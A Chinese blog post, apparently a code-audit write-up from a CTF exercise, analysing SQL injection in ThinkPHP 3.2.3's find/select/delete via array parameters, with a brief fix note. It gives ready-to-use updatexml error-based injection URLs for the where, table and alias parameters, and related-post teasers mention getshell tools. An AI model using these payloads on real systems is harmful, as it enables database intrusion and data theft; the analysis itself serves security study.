ThinkPHP3.2.3代码审计【find方法引起的SQL注入】

最新推荐文章于 2023-11-26 11:17:00 发布
最新推荐文章于 2023-11-26 11:17:00 发布
阅读量763 收藏 5
点赞数
分类专栏: 代码审计
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/117429889
版权
前言

复习好无聊,就去刷刷CTFshow的题目,刷到一个TP3.2.3的SQL注入,之前没分析过,就简要分析一下,也有利于我这菜鸡学习一下

文章目录

简介

不只是find方法,由于select(),find(),delete()方法可能会传入数组类型数据,导致可能的SQL注入隐患。

环境搭建

上官网下载3.2.3完整版http://www.thinkphp.cn/donate/download/id/610.html

\Application\Home\Controller\IndexController.class.php:

public function index()
{
    $id = i('id');
    $res = M('users')->find($id);
    var_dump($res);
    //$res = M('user')->delete($id);
    //$res = M('user')->select($id);
}
分析
where: http://127.0.0.1/thinkphp_3.2.3_full/index.php?m=Home&c=Index&a=index&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

直接分析find方法:

首先$option[where]的值即是我们传入的值,然后到Driver类中调用select方法。

其中又会调用buildSelectSql方法,这方法用来生成查询SQL语句的,跟进

buildSelectSql方法中有一个parseSql方法,这是很熟悉的方法了,它是用来替换生成SQL语句的,也是最容易出现问题的地方!!
在这里插入图片描述
单独看看这个替换SQL语句中表达式的方法:
它会用str_replace函数将一些参数替换进既定SQL模板语句中,最后返回这个SQL

既定SQL模板语句如下:

SELECT%DISTINCT% %FIELD% FROM %TABLE%%FORCE%%JOIN%%WHERE%%GROUP%%HAVING%%ORDER%%LIMIT% %UNION%%LOCK%%COMMENT%

在这里插入图片描述
根据$opention的值,显然我们这里只有%WHERE%可以替换

那么我们就会调用:$this->parseWhere(),跟进看看
在这里插入图片描述
直接将$whereStr的值拼接进去SQL语句中了,变成了这样:

WHERE 1 and updatexml(1,concat(0x7e,database(),0x7e),1) #

显然这是能触发报错注入的,再看看最终的SQL语句:

SELECT * FROM `users` WHERE 1 and updatexml(1,concat(0x7e,database(),0x7e),1) # LIMIT 1

不仅仅parseWhere()可以触发,与之类似拼接的parseGroup()、parseHaving()、parseOrder()都能触发:

protected function parseGroup($group) {
    return !empty($group)? ' GROUP BY '.$group:'';
}

protected function parseHaving($having) {
    return  !empty($having)?   ' HAVING '.$having:'';
}
    
protected function parseOrder($order) {
	............

    return !empty($order)?  ' ORDER BY '.$order:'';
}

此外还有 parseTable()也能触发,可以用id[where]和id[alias]参数触发。我懒就不分析这个了。

//Think/Model.class.php
protected function _parseOptions($options=array()) {
..............
if(!empty($options['alias'])) {
            $options['table']  .=   ' '.$options['alias'];
        }
        // 记录操作的模型名称
        $options['model']       =   $this->name;
...............        
}


//Drover.class.php
protected function parseTable($tables) {
	.............
	
		elseif(is_string($tables)){
            $tables  =  explode(',',$tables);
            array_walk($tables, array(&$this, 'parseKey'));
        }
        return implode(',',$tables);
    }
payload
table:http://127.0.0.1/thinkphp_3.2.3_full/index.php?m=Home&c=Index&a=index&id[table]=users where 1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) %23

alias:http://127.0.0.1/thinkphp_3.2.3_full/index.php?m=Home&c=Index&a=index&id[alias]=users where 1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) %23

where: http://127.0.0.1/thinkphp_3.2.3_full/index.php?m=Home&c=Index&a=index&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
																         		id[order]
																				id[having]
																				id[group]
修复

分析表达式的_parseOptions()的参数不再是我们可控的$option,导致我们的构造无法被利用
在这里插入图片描述

D.MIND
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【安全漏洞】ThinkPHP 3.2.3 漏洞复现.md
2201_75660665的博客
12-08 868
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
thinkphp3.2.3漏洞_TPscan一键ThinkPHP漏洞检测工具
weixin_39820244的博客
11-25 6486
1.简要描述这个工具写完有一段时间了,看网上目前还没有一个thinkphp的漏洞集成检测工具,所以打算开源出来。2.代码结构插件化思想,所有的检测插件都在plugins目录里,TPscan.py主文件负责集中调度。插件目录:ThinkPHP 用户模块checkcode SQL注入漏洞ThinkPHP 5.0.23远程代码执行ThinkPHP 5.0.23 Debug模式远程代码执行Thi...
OneThink前台注入分析1
08-03
OneThink前台注入分析OneThink 前台注入进后台分析我是某次授权的渗透过程中,遇到了 OneThink,那么经过一番审计和尝试,最终实现了 OneT
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 1725
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4484
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
ThinkPHP3.2.3框架实现执行原生SQL语句的方法示例
01-20
ThinkPHP3.2.3中,通过`M()`函数和`query()`、`execute()`方法,我们可以方便地执行原生SQL语句进行数据库操作。这种方式既保留了SQL的灵活性,又利用了框架的便利性。不过,为了确保代码的可维护性和安全性,建议...
thinkphp3.2.3 分页代码分享
10-21
主要为大家介绍了thinkphp3.2.3 分页代码,非常实用的代码,感兴趣的小伙伴们可以参考一下
thinkphp3.2.3框架动态切换多数据库的方法分析
10-15
ThinkPHP3.2.3框架提供了一种动态切换多数据库的方法,使得在同一个应用中管理多个数据库成为可能。本篇文章将详细解析这一功能。 首先,我们要了解ThinkPHP3.2.3的数据库配置。在ThinkPHP框架中,数据库配置通常...
免费thinkPHP3.2.3框架
07-20
1. 路由系统:ThinkPHP3.2.3支持自定义路由规则,可以根据不同的URL模式匹配到对应的控制器和方法。 2. MVC架构:分离业务逻辑、数据处理和视图展示,提升代码可读性和可维护性。 3. 模型层:提供数据操作接口,支持...
ThinkPHP3.2.3 find注入
LiBai'S BLOG
12-31 7325
find(),select(),delete()注入方法类似 主要是在解析完$options之后,还对$options['where']判断了一下是否为空 在 D:\phpstudy_pro\WWW\thinkphp3\Application\Home\Controller下的IndexController.class.php添加代码 一样的思路,首先用id=1 and走一遍流程 一直走,注意到这个地方,我们条件满足进入parseType函数 注意,这时候我们的data还是1 and 经过强制转换后我
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1058
thinkphp3.2.3 代码执行
[复现]Thinkphp3.2.3 漏洞
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5595
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
【漏洞复现】OneThink前台注入漏洞
失心少年
11-16 693
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!它提供了一系列通用的模块和功能,使开发者能够更轻松地构建具有灵活性和可扩展性的内容管理系统(CMS)和其他Web应用。
thinkphp漏洞利用工具-ThinkphpGUI(一)
siu~
08-17 3669
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
siu~
08-17 3518
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
ThinkPHP3.2.3_SQLi
Jeromeyoung
01-03 426
虽然是跟完了,但是如果能想一想这开发者为什么会这样写的话,会让我们对程序的代码逻辑更加亲切,也是一种提高审计能力的方法。我想:给where处理写一个解析数组的功能,肯定是为了迎合多个条件的where的情况,但是这里因为测试代码中只传入了一个条件所以没办法从这个漏洞跟一遍它的完整功能,但是看对exp进行的相关操作,开发者的原意应该是可以让“输入”去控制where条件中的判断逻辑符,比如‘>,
【Web】Ctfshow Thinkphp3.2.3代码审计(1)
最新发布
uuzeray的博客
11-26 332
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log。在fetch方法中执行了eval('?访问/Application/Runtime/Logs/Home/21_04_15.log。发现任意命令执行后门:/index.php?题目提示要爆破,而且不超过365次 (1年的天数)查看附件源码 (config.php)发现定义了一个可执行命令的路由规则。
ThinkPHP3.2.3开发手册:PDO重写,模块化增强
除此之外,ThinkPHP3.2.3完全开发手册还包含了详细的使用指南,涵盖了路由、模型、视图、控制器、模板引擎、缓存、 session、cookie、异常处理、日志记录等多个核心组件的使用方法。开发者可以通过手册了解如何创建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值